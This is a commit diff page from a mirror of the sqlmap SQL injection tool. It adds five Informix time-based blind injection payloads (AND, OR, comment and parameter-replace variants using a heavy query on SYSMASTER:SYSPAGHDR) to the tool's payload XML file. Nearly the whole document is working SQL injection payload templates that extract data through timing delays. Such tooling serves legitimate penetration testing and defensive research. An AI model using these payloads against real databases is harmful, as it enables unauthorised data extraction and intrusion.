PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-30 19:39:08 +00:00
Code Issues Projects Releases Wiki Activity

Adding time-based blind (heavy query) payloads for Informix (Issue #552)

Browse Source
This commit is contained in:
Miroslav Stampar
2016-09-28 10:30:09 +02:00
parent e5a758bdf4
commit d36b5c0a4b
3 changed files with 103 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

103
xml/payloads/time_blind.xml
View File

@@ -1337,7 +1337,85 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<test>
<title>Informix AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses -->
@@ -1697,7 +1775,7 @@
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
@@ -1738,6 +1816,25 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests - Parameter replace -->
<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -1938,6 +2035,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>